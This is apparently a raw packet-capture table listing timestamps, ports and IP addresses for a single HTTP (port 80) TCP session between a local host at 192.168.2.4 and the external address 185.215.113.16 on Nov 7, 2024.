Nov 7, 2024 04:12:27.747051001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747060061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747065067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747071028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747081041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747087955 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747091055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747100115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747101068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747109890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747131109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747148991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747178078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747189045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747199059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747210026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747217894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747220993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747226954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747230053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747242928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747256994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747262001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747272015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747277975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747282982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747292995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747292995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747318983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747330904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747337103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747342110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747355938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747359037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747366905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747378111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747381926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747389078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747401953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747401953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747423887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747443914 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747443914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747454882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747478962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747486115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747489929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747497082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747507095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747520924 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747535944 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747548103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747651100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747669935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747680902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747694016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747703075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747723103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747728109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747739077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747750044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747762918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747762918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747781038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747786045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747788906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747795105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747807980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747828960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747833014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747843981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747864962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747895002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747900963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747911930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.747937918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.747947931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.748059034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.748070955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.748080969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.748099089 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.748109102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.748136044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.748442888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.748492956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.748495102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.748533010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.819694996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819744110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819761038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819781065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819787025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.819792986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819804907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819814920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.819816113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819828987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819860935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819870949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.819871902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819884062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819895983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819900036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.819931030 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.819956064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.819962978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819976091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819987059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.819996119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820003986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820008993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820019960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820031881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820034027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820049047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820060015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820067883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820077896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820089102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820097923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820108891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820120096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820122004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820133924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820144892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820144892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820157051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820169926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820175886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820199966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820203066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820214033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820221901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820225954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820246935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820246935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820259094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820269108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820270061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820292950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820300102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820303917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820312023 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820314884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820344925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820369005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820374966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820410967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820431948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820444107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820457935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820468903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820472002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820482016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820492029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820493937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820518970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820528030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820543051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820547104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820559025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820570946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820573092 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820578098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820597887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820620060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820638895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820651054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820662022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820672035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820684910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820689917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820700884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820713043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820718050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820722103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820750952 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820751905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820764065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820799112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820817947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.820944071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820961952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820976019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.820997000 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821000099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821011066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821022987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821023941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821044922 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821058035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821068048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821079969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821080923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821105003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821137905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821177959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821197033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821209908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821217060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821221113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821229935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821233034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821244955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821254969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821283102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821326971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821343899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821356058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821372986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821403980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821469069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821480989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821495056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821511030 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821533918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821538925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821546078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821568966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821568966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821580887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821592093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821602106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821604967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821616888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821639061 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821649075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821660995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821677923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821686029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821703911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821712017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821716070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821732044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821742058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.821748018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821758986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.821788073 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.822001934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.822045088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.822057009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.822067976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.822082043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.822093010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.822098970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.822122097 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.822144032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855195045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855204105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855215073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855262041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855273962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855283022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855289936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855299950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855334044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855334997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855345964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855355024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855356932 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855366945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855376959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855381012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855416059 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855462074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855470896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855480909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855492115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855499983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855504990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855509996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855511904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855530977 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855561972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855593920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855606079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855618954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855638981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855643034 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855650902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855659008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855663061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855674982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855680943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855690956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855695963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855698109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855709076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855721951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855751038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855752945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855762959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855772972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855789900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855792999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855803013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855813980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855824947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855837107 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855844975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855848074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855866909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855870962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855879068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855889082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855891943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855901003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855912924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855923891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855930090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855940104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855942011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855962992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855967999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855979919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.855988026 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.855989933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856000900 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856008053 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856025934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856033087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856044054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856055975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856057882 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856067896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856080055 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856112957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856148005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856187105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856216908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856228113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856246948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856261969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856267929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856281042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856290102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856292009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856318951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856338978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856347084 CET	49762	80	192.168.2.4	185.215.113.16
